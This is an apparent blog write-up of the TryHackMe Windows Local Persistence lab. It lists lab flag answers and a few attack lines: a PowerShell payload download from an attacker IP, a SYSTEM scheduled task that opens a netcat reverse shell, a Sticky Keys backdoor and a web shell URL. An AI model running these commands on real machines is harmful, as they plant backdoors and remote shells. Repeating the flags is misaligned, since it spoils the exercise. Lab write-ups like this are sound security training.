It’s Thursday and we are persisting with the Windows Local Persistence room on THM!
This one is quite a long one.. that’s what she said and as you may have noticed it has stretched over multiple blog posts, but we will keep going until it’s done!
powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.11.125.150:8000/rev-svc.exe’,’payload.exe’)”
Flag 7 – THM{SUSPICIOUS_SERVICES}
schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr “c:\tools\nc64 -e cmd.exe 10.11.125.150 4449” /ru SYSTEM
Flag 9 – THM{JUST_A_MATTER_OF_TIME}
Flag 10 – THM{NO_NO_AFTER_YOU}
Flag 11 – THM{LET_ME_HOLD_THE_DOOR_FOR_YOU}
Flag 12 – THM{I_INSIST_GO_FIRST}
Flag 13 – THM{USER_TRIGGERED_PERSISTENCE_FTW}
Enable the trigger for Sticky Keys (SHIFT x 5 ) will spawn cmd.exe with system level access
Flag 14 – THM{BREAKING_THROUGH_LOGIN}
Flag 15 – THM{THE_LOGIN_SCREEN_IS_MERELY_A_SUGGESTION]
http://10.10.48.191/shell.aspx
Flag 16 – THM{EZ_WEB_PERSISTENCE}
Flag 17 – THM{I_LIVE_IN_YOUR_DATABASE}
- Hexacorn – Windows Persistence
- PayloadsAllTheThings – Windows Persistence
- Oddvar Moe – Windows Persistence Through RunOnceEx
- PowerUpSQL
Until next time & don’t sleepwalk through life!
Bi xatirê te